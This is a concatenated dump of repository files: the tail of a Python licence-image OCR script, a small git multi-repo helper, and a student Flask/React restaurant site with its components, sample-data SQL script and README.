(1.0*args.textline_height)/(1.0*textline_img.shape[0])\n textline_img = cv2.resize(textline_img, None, fx=scale, fy=scale)\n textline_imges.append(textline_img)\n textline_poses.append(textline)\n if debug:\n cv2.imwrite('./debug/textline_crop/'+textline_name, textline_img)\n # filter the uncorrect textlines\n for i in reversed(xrange(len(textline_poses))):\n if textline_poses[i][3]-textline_poses[i][1] > textline_std_height:\n del textline_imges[i]\n del textline_poses[i]\n rect_x0, rect_y0, rect_x1, rect_y1 = 0, 0, 0, 0\n for i in xrange(len(textline_poses)):\n if i == 0:\n rect_x0 = textline_poses[i][0]\n rect_y0 = textline_poses[i][1]\n rect_x1 = textline_poses[i][2]\n rect_y1 = textline_poses[i][3]\n continue\n if textline_poses[i][0] < rect_x0:\n rect_x0 = textline_poses[i][0]\n if textline_poses[i][1] < rect_y0:\n rect_y0 = textline_poses[i][1]\n if textline_poses[i][2] > rect_x1:\n rect_x1 = textline_poses[i][2]\n if textline_poses[i][3] > rect_y1:\n rect_y1 = textline_poses[i][3]\n if debug:\n license_image=license.copy()\n for i in xrange(len(textline_poses)):\n cv2.rectangle(license_image,(textline_poses[i][0],textline_poses[i][1]),\\\n (textline_poses[i][2],textline_poses[i][3]),(0,0,255))\n cv2.rectangle(license_image,(rect_x0,rect_y0),(rect_x1,rect_y1),(255,0,0))\n if len(textline_poses)>=8:\n step = (rect_y1-rect_y0)/8.0\n for i in xrange(8):\n cv2.rectangle(license_image,(int(rect_x0),int(rect_y0+step*i)),\\\n (int(rect_x1),int(rect_y0+step*(i+1))),(0,255,0))\n cv2.imwrite('./debug/textline_bbox/'+image_name,license_image)\n # recogntion\n textline_chars, textchar_probs, textchar_charnum, textchar_poses = [],[],[],[]\n for i in xrange(len(textline_imges)):\n textline_name = image_name[0:image_name.find('.')] + '_' + str(i) + '.png'\n bgr_img1 = textline_imges[i].copy()\n rgb_img = textline_imges[i].copy()\n rgb_img[:,:,0] = bgr_img1[:,:,2]\n rgb_img[:,:,1] = bgr_img1[:,:,1]\n rgb_img[:,:,2] = bgr_img1[:,:,0]\n # segmenation\n p1, p2, p3, p4, p5, p6 = char_segmentor.segment(rgb_img)\n p1_int = p1.astype(int)\n p2_int = p2.astype(int)\n p3_int = p3.astype(int)\n p4_int = p4.astype(int)\n p5_int = p5.astype(int)\n p6_int = p6.astype(int)\n if debug:\n bgr_img2 = bgr_img1.copy()\n for j in xrange(p1_int.shape[0]):\n cv2.rectangle(bgr_img2,(p1_int[j,0],p1_int[j,2]),\\\n (p1_int[j,1],p1_int[j,3]),(0,0,255))\n cv2.imwrite('./debug/textline_seg1/'+textline_name,bgr_img2)\n if debug:\n bgr_img3 = bgr_img1.copy()\n for j in xrange(p4_int.shape[0]):\n cv2.rectangle(bgr_img3,(p4_int[j,0],p4_int[j,2]),\\\n (p4_int[j,1],p4_int[j,3]),(0,255,0))\n cv2.imwrite('./debug/textline_seg2/'+textline_name,bgr_img3)\n # recognition\n chars, probs, charnum, poses = text_recognizer.\\\n recogtext(bgr_img1, p1_int, p2_int, p3_int, p4_int, p5_int, p6_int)\n if debug:\n pre_str = ''\n bgr_img4 = bgr_img1.copy()\n for k in xrange(chars.shape[0]):\n pre_char = code2char[str(int(chars[k,0]))].encode('utf-8')\n if charnum[k] == 1:\n color = (0,0,255)\n elif charnum[k] == 2:\n color = (0,255,0)\n elif charnum[k] == 3:\n color = (255,0,0)\n elif charnum[k] == 4:\n color = (0,255,255)\n elif charnum[k] == 5:\n color = (255,0,255)\n elif charnum[k] == 6:\n color = (255, 255, 0)\n cv2.rectangle(bgr_img4,(poses[k,0],poses[k,2]),(poses[k,1],poses[k,3]),color)\n pre_str = pre_str+pre_char\n cv2.imwrite('./debug/textline_rec/'+textline_name[0:textline_name.find('.')]\\\n +'_'+pre_str+'.png',bgr_img4)\n # \n textline_chars.append(chars)\n textchar_probs.append(probs)\n textchar_charnum.append(charnum)\n textchar_poses.append(poses)\n # todo: consider use a language model to finetune the text\n textline_text = []\n for i in xrange(len(textline_chars)):\n text = ''\n for j in xrange(textline_chars[i].shape[0]):\n text = text + code2char[str(int(textline_chars[i][j,0]))]\n #print text\n textline_text.append(text)\n # arrange item using heuristic rules\n ret_status, ret_info = itemizer.arrange(textline_poses, textline_text, textline_chars,\\\n textchar_poses, code2char, ret_status, ret_info,\\\n (rect_x0,rect_y0,rect_x1,rect_y1))\n\n else:\n print('Image file does not exist!')\n ret_status['12'] = 0\n count = 0\n for (k,v) in ret_info.items():\n if v != '':\n ret_status[k] = 1.0\n count += 1\n ret_status['13'] = count\n if debug:\n log_file = codecs.open('./debug/log.txt','a','utf-8')\n log_file.write(image+'\\n')\n for (k,v) in ret_info.items():\n string = k+':'+v+'\\n'\n #print(string)\n log_file.write(string)\n log_file.close()\n return ret_status, ret_info\n\nif __name__ == '__main__':\n if debug:\n shutil.rmtree('./debug')\n os.makedirs('./debug/license_detect')\n os.makedirs('./debug/textline_bbox')\n os.makedirs('./debug/textline_crop')\n os.makedirs('./debug/textline_rec')\n os.makedirs('./debug/textline_seg1')\n os.makedirs('./debug/textline_seg2')\n \n img_dir = configPath.ROOT_PATH + args.raw_image_dir + args.license_image_train\n textline_dir = configPath.ROOT_PATH + args.raw_image_dir + args.textline_image_train\n demo_imnames = os.listdir(img_dir)\n \n count = 0\n for img_name in demo_imnames:\n count = count + 1\n if count < 10000:\n continue\n if count == 10050:\n break\n print('count:'+str(count)+' '+img_name)\n img_path = img_dir + '/' + img_name\n print(\"img path\"+\" \" + img_path )\n status, info = process(img_path)\n for (k,v) in info.items():\n print(k+':'+v.encode('utf-8'))\n \n \n" } ]
2
softagram/allrepos-utility
https://github.com/softagram/allrepos-utility
b3e82a46acdf7756d91d4c7d0138dcaa5cda0d14
be2a2f69ecd8e43aea473f8f62f4fb74fe874082
59fa21895c23c5de94dc4e1bb921416652c3dca2
refs/heads/main
2023-07-12T08:02:13.063690
2021-08-19T14:55:23
2021-08-19T14:55:23
330,932,624
0
1
MIT
2021-01-19T09:48:01
2021-01-19T09:50:42
2021-08-19T14:55:23
Python
[ { "alpha_fraction": 0.5470588207244873, "alphanum_fraction": 0.5509803891181946, "avg_line_length": 25.842105865478516, "blob_id": "4baf94d7b697faac8172e5e34d74d4f96759bf41", "content_id": "0166a2abefb8af101435b333a16e18cbd014be46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "permissive", "max_line_length": 64, "num_lines": 19, "path": "/allrepos.py", "repo_name": "softagram/allrepos-utility", "src_encoding": "UTF-8", "text": "# See README.md for documentation.\n\nimport sys\nimport os\n\nargs = sys.argv[1:]\next_slot = ''\next_args = []\nif 'IF_OK_EXECUTE_ALSO' in args:\n pos = args.index('IF_OK_EXECUTE_ALSO')\n ext_args = args[pos + 1:]\n args = args[:pos]\n\nfor fn in os.listdir('.'):\n if os.path.isdir(fn) and os.path.exists(fn + '/.git'):\n main_cmd = f'echo {fn} && git -C {fn} ' + ' '.join(args)\n if ext_args:\n ext_slot = f' && git -C {fn} ' + ' '.join(ext_args)\n os.system(main_cmd + ext_slot)\n" }, { "alpha_fraction": 0.7428139448165894, "alphanum_fraction": 0.7503781914710999, "avg_line_length": 29.045454025268555, "blob_id": "01bfe2280624e4ce0591131b6439c869facdbc3e", "content_id": "a89591291799c93d13bde38d8713c96e755ddb8b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "permissive", "max_line_length": 105, "num_lines": 22, "path": "/README.md", "repo_name": "softagram/allrepos-utility", "src_encoding": "UTF-8", "text": "# allrepos.py: get stuff done with 100x git repo directories\n\nUtility for working with multiple repos when repos have been placed in a single top level dir\n\n# Couple of example use cases\n\n## Run fetch for all\n`python allrepos.py fetch`\n\n## Get default branches\n`python allrepos.py symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@ @'`\n\n## Delete all branches with name foo from remotes:\n`python allrepos.py ls-remote --exit-code --heads origin foo IF_OK_EXECUTE_ALSO push origin --delete foo`\n\n\n\n# Requirements\n- Python 3.6+ since uses f-strings.\n- Git.\n\nNote: the examples here involve usage of unix tools, but this is not limited to unix.\n" } ]
2
akash395/Foodinit
https://github.com/akash395/Foodinit
034133d16d5b9d261ec254c5250df787808f3d4f
60eed7f0b82b3003c9144b76968bb139c59c987d
5011a03aa566855e923b05e8f6b6e91f4fdb0cae
refs/heads/main
2023-02-06T11:01:57.824842
2020-12-29T03:59:08
2020-12-29T03:59:08
325,179,540
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.491150438785553, "alphanum_fraction": 0.6681416034698486, "avg_line_length": 16.83333396911621, "blob_id": "076d181cf29efea31056a59838fe9a3f369e8d78", "content_id": "744e98cdc1ff46fada384d5f36d0eac1674a9cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 226, "license_type": "no_license", "max_line_length": 23, "num_lines": 12, "path": "/flaskapp/requirements.txt", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "click==7.1.2\r\nFlask==1.1.2\r\nFlask-MySQLdb==0.2.0\r\nFlask-SQLAlchemy==2.4.4\r\nitsdangerous==1.1.0\r\nJinja2==2.11.2\r\nMarkupSafe==1.1.1\r\nmysqlclient==2.0.1\r\npython-dotenv==0.15.0\r\nPyYAML==5.3.1\r\nSQLAlchemy==1.3.20\r\nWerkzeug==1.0.1\r\n" }, { "alpha_fraction": 0.5244003534317017, "alphanum_fraction": 0.5442514419555664, "avg_line_length": 34.55882263183594, "blob_id": "ccb9e762fdb79323471dd7d4d60d5e76c9ce5440", "content_id": "35bcd7d2418661418866aae4d5e3ab8e5f24e8c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1209, "license_type": "no_license", "max_line_length": 129, "num_lines": 34, "path": "/src/components/About.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport {Link} from 'react-router-dom'\nimport Shrimp_tempura from './../images/Shrimp_tempura.jpg'\nimport Caeser_salad from './../images/Caeser_salad.jpg'\nimport ONLINE_FOOD from './../images/ONLINE_FOOD.jpg'\n\nfunction About() {\n return (\n <div>\n <center><br/><br/>\n <h3 className=\"H3class\">About Us</h3>\n <h2>Welcome to FoodInIt. FoodInIt was created to provide a greater quality in food that will satisfy consumers. <br/>\n Food can be delivered right to your doorstep or you can simply pick it up here. <br/>\n We strive to provide the utmost quality and hope that everyone is satisfied with our food! <br/>\n </h2>\n <br/>\n <br/>\n <img src = {Shrimp_tempura}></img>\n <img src = {Caeser_salad}></img>\n </center>\n <br/>\n <div className = \"container\" id = \"section-2-gradient\">\n\n <h2 className=\"large\">Business Hours:</h2>\n <h3>Mon - Fri:\t7:00 AM - 11:00 PM <br/>\n Sat & Sun:\t6:00 AM - 11:00 PM <br/>\n </h3>\n </div>\n </div>\n )\n}\n\n\nexport default About\n" }, { "alpha_fraction": 0.3732227385044098, "alphanum_fraction": 0.3850710988044739, "avg_line_length": 24.836734771728516, "blob_id": "a98f587b1fc0f0b0275edcbfaad6c8898848a27a", "content_id": "8421dc4d2361eed3b6ecf5e0efa5e85aff8c4baa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2532, "license_type": "no_license", "max_line_length": 61, "num_lines": 98, "path": "/src/components/Breakfast.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Bacon_wrap from './../images/Bacon_wrap.jpg'\nimport Bagel_cc from './../images/Bagel_cc.jpg'\nimport French_slam from './../images/French_slam.jpg'\nimport Ham_croissant from './../images/Ham_croissant.jpg'\nimport Muffin from './../images/Muffin.jpg'\nimport Pancake from './../images/Pancake.jpg'\nimport Sausage_burrito from './../images/Sausage_burrito.jpg'\nimport Veggie_omelet from './../images/Veggie_omelet.jpg'\nimport Waffle from './../images/Waffle.jpg'\n\nfunction Breakfast() {\n return (\n <div>\n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Bacon_wrap} \n name = \"Bacon Wrap\"\n price = \"$5.50\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Bagel_cc}\n name = \" Bagel Cream Cheese\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {French_slam}\n name = \"French Slam\"\n price = \"$7.75\"\n />\n\n\n </div>\n <div className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Ham_croissant}\n name = \"Ham Croissant\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Muffin}\n name = \"Muffin\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Pancake}\n name = \"Pancake\"\n price = \"$9.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Sausage_burrito}\n name = \"Sausage Burrito\"\n price = \"$8.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Veggie_omelet}\n name = \" Veggie Omelet\"\n price = \"$5.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Waffle}\n name = \"Waffle\"\n price = \"$7.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Breakfast\n" }, { "alpha_fraction": 0.36938369274139404, "alphanum_fraction": 0.38687872886657715, "avg_line_length": 30.8354434967041, "blob_id": "d0baf35db185117024a511c1469d8c581d4b86ac", "content_id": "4b2edf33bdfb38ba20db415af6d019be100fbc69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 102, "num_lines": 79, "path": "/src/components/ManagerPage.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from 'react'\nimport {BrowserRouter as Router, Switch, Route} from 'react-router-dom'\nimport ManagerLoginForm from './ManagerLoginForm'\nimport \"./../App.css\"\n\nexport class ManagerPage extends Component {\n constructor (){\n super ();\n this.state = {\n employees : [],\n isChecked: false\n }\n }\n\n template (args){\n return (\n <p>args</p>\n )\n }\n\n componentDidMount(){\n const apiUrl = \"/getemployeerecords\";\n let record = this.state.employees;\n fetch(apiUrl)\n .then (response => response.json())\n .then (data => this.setState({\n employees: data\n }))\n }\n\n \n render() { \n const tableStyle = {\n border: '1px solid black'\n }\n return (\n <div className=\"row\">\n <div className=\".col-9\">\n <h2 style = {{color: 'blue'}}>View Employee records</h2>\n <table style = {{width:\"100%\"}} className=\"uppertable\">\n <tr style = {{color : 'teal'}}>\n <th style = {{width:\"100%\"}}>Employee_id</th>\n <th style = {{width:\"100%\"}}>First Name</th> \n <th style = {{width:\"100%\"}}>Last Name</th> \n <th style = {{width:\"100%\"}}>Position</th> \n <th style = {{width:\"100%\"}}>Salary</th>\n </tr>\n </table>\n\n <p>{this.state.employees.map (record => (\n\n <table style ={{width:\"50%\"}} >\n \n <tr>\n\n <th className=\"EmployeeRecords\">\n <td style = {{width:\"15%\"}}>{record[0]}</td>\n <td style = {{width:\"25%\"}}>{record[1]}</td>\n <td style = {{width:\"15%\"}}>{record[2]}</td>\n <td style = {{width:\"20%\"}}>{record[3]}</td>\n <td style = {{width:\"5%\"}} >{record[4]}</td>\n {/* <p>{record[0]} {record[1]} {record[2]} {record[3]} {record[4]}</p> */}\n </th>\n \n </tr>\n\n </table>\n ))}\n </p>\n </div>\n <div className=\".col-3\">\n \n </div>\n </div>\n )\n }\n}\n\nexport default ManagerPage\n" }, { "alpha_fraction": 0.43451568484306335, "alphanum_fraction": 0.44065484404563904, "avg_line_length": 33.904762268066406, "blob_id": "356a3e5e9aaad7741f82f7ac48725f43bc75a3ab", "content_id": "29919501c830a23677a2d7703e81389d5a09ddc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 115, "num_lines": 42, "path": "/src/components/ContactUs.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from \"react\";\n\nexport default class ContactUs extends Component {\n constructor (){\n super ();\n this.state = {\n clickedSubmit: 0,\n }\n }\n render() {\n return (\n <div className=\"Container1\">\n <form action = 'http://localhost:5000/contactus' method = 'post'>\n <h3 className = \"H3class\">Contact Us</h3>\n\n <div className=\"form-group\">\n <label>Full Name</label> \n <input type=\"text\" className=\"form-control\" placeholder=\"Enter Full Name\" name = \"full name\" />\n </div>\n <br></br>\n <div className=\"form-group\">\n <label>Email</label>\n <input type=\"email\" className=\"form-control\" placeholder=\"Enter Email\" name = \"email\" />\n \n </div>\n <br></br>\n <div className=\"form-group\">\n <div className=\"form-group\">\n <label>Message</label> \n <input type=\"text\" className=\"form-control\" placeholder=\"Type your message\" name = \"message\" />\n </div>\n </div>\n <br></br>\n <br></br>\n <button type=\"submit\" className=\"SubmitBtn\">Submit</button>\n <br></br>\n <br></br>\n </form>\n </div>\n );\n }\n}\n" }, { "alpha_fraction": 0.4642857015132904, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 139, "blob_id": "2a376c0a88f170680326b007deb0d28c2a458091", "content_id": "ef73622c5b311d2f87332efba61e4f2667a6a7a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 140, "license_type": "no_license", "max_line_length": 139, "num_lines": 1, "path": "/Reports/OverallCollaborationDiagram.md", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "<img src=\"https://user-images.githubusercontent.com/38135805/99490266-836f9480-2937-11eb-8fbb-f21d08312dd5.png\" width=\"1510\" height=\"1650\">\n" }, { "alpha_fraction": 0.7689433097839355, "alphanum_fraction": 0.7749636769294739, "avg_line_length": 61.558441162109375, "blob_id": "acafea59b2bb40218dd2156726b17ebf0bb96d83", "content_id": "18df267eb3685c35552c1f74067a2bc86fab889a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4817, "license_type": "no_license", "max_line_length": 465, "num_lines": 77, "path": "/README.md", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "# To run the online restaurant project: CSC322 Software Engineering\n\n### Extra Details\n- Languages Used: Python, CSS, Javascript, HTML\n- Also Used: Flask, MySQL\n\n### Instructions\n\n1. Install Node.js from https://nodejs.org/en/\n2. Install Git from https://git-scm.com/\n3. Open a terminal, and go to desired directory.\n4. git clone https://github.com/myumbla3/OnlineRestaurant.git\n5. npm install (for installing dependencies for frontend)\n6. make a virtual environment to download all python dependencies\n7. activate that environment\n8. pip install -r requirements.txt (found in src->flaskapp folder)\n9. For Foodinit.sql, this file is used for MYSQL Workbench, which you also need to install for the database\n to work. Set accounts have been created to allow the user to sign in successfully\n10. once all dependencies are installed type python app.py\n![App](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/app.png)\n\n11. Then in another terminal, type:npm start, which will open up a browser in localhost for you to access the websites\n![npm](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/npm.png)\n\n### Home Page\n![Home](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/home.png)\n\n- This is the home page for the website where a video displays food and there is a navigation bar at the top of the website where you can navigate to\n the various parts of the website, including the menu, signing in, contacting us, etc.\n\n### Menu Page\n![Menu](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Menu.png)\n\n- The top picks food are displayed at the front of the Menu, and there is the feature to add any of the to the cart, but that feature isn't working right now.\n On the left hand side of the page, there is a trigram in which you can click and it will display the various options of food provided, whether it be\n Breakfast, Lunch, Dinner, Specials, etc.\n \n - Breakfast\n ![Breakfast](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Breakfast.png)\n \n - Lunch\n ![Lunch](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/lunch.png)\n \n - Dinner\n ![Dinner](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Dinner.png)\n \n### Admin Page\n![Admin](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/admin.png)\n\n- This is the Admin page where the Managers will sign in instead of the usual sign in method.\n\n#### Requirements\n![Req](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/AdminReq.png)\n\n- If you don't implement anything within the text boxes, then there wil be a red ring around the text boxes and text indicating that\n you did not meet the requirements to log in.\n \n#### Token Acceptance\n![Token](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/token.png)\n\n- This token indicates that when you sign in through admin, then you successfully signed in. The manager is now within the database. We tried to fix the token, but\n it didn't work properly and just displayed the token as one string of text.\n\n### Sign In Page\n![SignIn](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/SignIn.png)\n\n![SignError](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/signerror.png)\n\n- There are problems within the sql file itself. If you type in any of the Customer Values in the Sign In Page,\n it will allow you to successfully sign in to the website itself. However, we lacked enough back end skills\n to differentiate a registered customer, vip customer and guest surfer. Vip customers would've had a \n specialized menu catered to their preferences, and registered customers would've been redirected to the top picks in the menu. We also tried to use escape_string from\n MySQLdb in order to redirect the VIP and Registered customers to different pages based on their deposit funds.\n \n- Unfortunately, we realize that we should've focused more of our time on the back end first, and add a front end onwards. The back end is more important to work on since that is where\n all the information is stored. Since this is a first for all of us, we were lost on how to start. Once we did start, we encountered various problems with our machines. A lot of precious time were spent on debugging the problem on how to get things up and running before actually coding. As mentioned previously we spent a lot of time with tutorials learning new things and information on how to do this kind of project rather than starting our own version of it. \nThrough this proejct we learned our strengths and weaknesses and what areas we need to improve on. We got valuable experience on how to tackle this type of project and situation in the real world job. We all learned from our mistakes and hopefully we can avoid this kind of behavior in the job field.\n" }, { "alpha_fraction": 0.6632001996040344, "alphanum_fraction": 0.7073977589607239, "avg_line_length": 37.825687408447266, "blob_id": "faabed451bc1b4139837ab479b91bfed11625b35", "content_id": "b941c58ea6d45815d00204413efac428ac9d24f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 98, "num_lines": 109, "path": "/foodinit.sql", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "USE FOODINIT;\n\nCREATE TABLE IF NOT EXISTS Customer (\n\tcustomer_id INT AUTO_INCREMENT PRIMARY KEY,\n first_Name VARCHAR (30) NOT NULL,\n last_name VARCHAR (30) NOT NULL,\n phone VARCHAR (10) NOT NULL,\n funds DECIMAL (10,2) NOT NULL,\n total_spendings DECIMAL (10,2) NOT NULL,\n email_id VARCHAR (50) NOT NULL,\n pass VARCHAR (20) NOT NULL,\n CHECK (length(pass) >= 8),\n vip_status VARCHAR (3) NOT NULL\n);\nDROP TABLE Customer;\nINSERT INTO Customer (\n\tcustomer_id, first_name, \n last_name, phone, funds, \n total_spendings, email_id,\n pass\n)\nVALUES (1, 'Mumtahid', 'Akash', '9294353796', 35, 0, '[email protected]', 'a1b2c3d4');\nINSERT INTO Customer (\n\tcustomer_id, first_name, \n last_name, phone, funds, \n total_spendings, email_id,\n pass\n)\nVALUES (2, 'MD', 'Hossain', '9175184400', 15, 10, '[email protected]', 'ABCDEFGH');\nINSERT INTO Customer (\n\tcustomer_id, first_name, \n last_name, phone, funds, \n total_spendings, email_id,\n pass\n)\nVALUES (3, 'Sajid', 'Mahmud', '6465451125', 65, 80, '[email protected]', '12345678');\nINSERT INTO Customer (\n\t first_name, \n last_name, phone, funds, \n total_spendings, email_id,\n pass\n)\nVALUES ('Anvinh', 'Mahmud', '6465451125', 65, 80, '[email protected]', '12345678');\nINSERT INTO Customer (\n\t first_name, \n last_name, phone, funds, \n total_spendings, email_id,\n pass\n)\nVALUES ('Myriam', 'yumbla', '9294267390', 15, 10, '[email protected]', '3q445casFf');\n\nCREATE TABLE IF NOT EXISTS Customer_Address (\n\taddress_id INT AUTO_INCREMENT PRIMARY KEY,\n street_address VARCHAR (50) NOT NULL,\n zipcode INT NOT NULL,\n state CHAR (2) NOT NULL,\n customer_id INT,\n FOREIGN KEY (customer_id) REFERENCES Customer (customer_id)\n);\nDROP TABLE Customer_address;\n\nCREATE TABLE IF NOT EXISTS Manager (\n\tmanager_id INT AUTO_INCREMENT PRIMARY KEY ,\n manager_first_name VARCHAR (20) NOT NULL,\n manager_last_name VARCHAR (20) NOT NULL,\n manager_email VARCHAR (50) NOT NULL,\n manager_password VARCHAR (20) NOT NULL,\n CHECK (length (manager_password) >= 8)\n );\nDROP TABLE Manager;\n\nINSERT INTO Manager (manager_first_name, manager_last_name, manager_email, manager_password)\nVALUES ('Sakai', 'Gin', '[email protected]', 'sakaigin1');\nINSERT INTO Manager (manager_first_name, manager_last_name, manager_email, manager_password)\nVALUES ('Sakata', 'Gintoki', '[email protected]', 'sakaigintoki1');\n\nCREATE TABLE IF NOT EXISTS Employee (\n\temployee_id INT AUTO_INCREMENT PRIMARY KEY,\n employee_first_name VARCHAR (20) NOT NULL,\n employee_last_name VARCHAR (20) NOT NULL,\n employee_position VARCHAR (20) NOT NULL,\n employee_salary INT NOT NULL\n);\nDROP TABLE Employee;\n\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Sakurajima', 'Mai', 'Chef', 25000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Vinsmoke', 'Sanji', 'Chef', 45000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Anos', 'Voldigoad', 'Delivery Person', 10000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Mao', 'Sama', 'Cashier', 15000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Sakura', 'Matou', 'Chef', 30000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Nasa', 'Yuzaki', 'Cashier', 10000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Roronoa', 'Zoro', 'Janitor', 20000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Saeko', 'Busujima', 'Waiter', 55000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Okabe', 'Rintarou', 'Waiter', 50000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Jason', 'Bourne', 'Waiter', 60000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Kara', 'Zor el', 'Waiter', 60000);\n\nSELECT * FROM Employee" }, { "alpha_fraction": 0.4790187180042267, "alphanum_fraction": 0.48676565289497375, "avg_line_length": 36.682926177978516, "blob_id": "2114685fa0abf7d3af9f5a025bc149f043c105e6", "content_id": "fce604e33f0b22056d16cd0626ef0b9d26e8ebe0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 118, "num_lines": 41, "path": "/src/components/SignUp.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\n\nfunction SignUp() {\n\n return (\n\n <div className=\"Container2\">\n <form action = 'http://localhost:5000/signup' method = 'post'>\n <h3 className=\"H3class\">Sign Up</h3>\n\n <div className=\"form-group\">\n <label>First name</label><br></br>\n <input type=\"text\" className=\"form-control\" placeholder=\"First name\" name = 'fname' />\n </div>\n\n <div className=\"form-group\">\n <label>Last name</label><br></br>\n <input type=\"text\" className=\"form-control\" placeholder=\"Last name\" name= 'lname'/>\n </div>\n\n <div className=\"form-group\">\n <label>Email address</label><br></br>\n <input type=\"email\" className=\"form-control\" placeholder=\"Enter email\" name = 'email'/>\n </div>\n\n <div className=\"form-group\">\n <label>Password</label><br></br>\n <input type=\"password\" className=\"form-control\" placeholder=\"Enter password\" name = 'password'/>\n </div>\n <br></br><br></br>\n <button type=\"submit\" className=\"SignUpBtn\">Sign Up</button><br></br><br></br>\n <p className=\"forgot-password text-right\">\n Already registered? <a href=\"http://localhost:3000/signin\"> sign in</a>\n </p>\n \n </form>\n </div>\n )\n}\n\nexport default SignUp\n\n\n\n\n" }, { "alpha_fraction": 0.4809116721153259, "alphanum_fraction": 0.4923076927661896, "avg_line_length": 38, "blob_id": "42a0672c00a98eea8459ae669f9104381e73f495", "content_id": "30578090cfa6c0cb60cf28d4ff6980f3af75a49d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1755, "license_type": "no_license", "max_line_length": 235, "num_lines": 45, "path": "/src/components/Home.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from \"react\";\nimport {Link} from 'react-router-dom'\nimport Bacon_wrap from './../images/Bacon_wrap.jpg'\nimport Smoke_salmon from './../images/Smoke_salmon.jpg'\nimport Truffle_gnocchi from './../images/Truffle_gnocchi.jpg'\n\n\nexport default class Home extends Component {\n render() {\n return (\n\n <div> \n <div className=\"container\" id=\"section-1-gradient\">\n \n <h1 className=\"justheading\"><center>FoodInIt</center></h1> \n <div className =\"row\">\n <div className=\"col-6\">\n <div className=\"leftside-col\">\n <h1 className=\"large\">Easy Access</h1>\n <h1 className=\"large\">Made for Food lovers</h1>\n \n </div>\n </div>\n </div>\n <div className=\"col-6\">\n <div className=\"videoMargin\">\n <div className=\"videoContainer\"> \n <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/rzNXJ9w_Zhs\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>\n 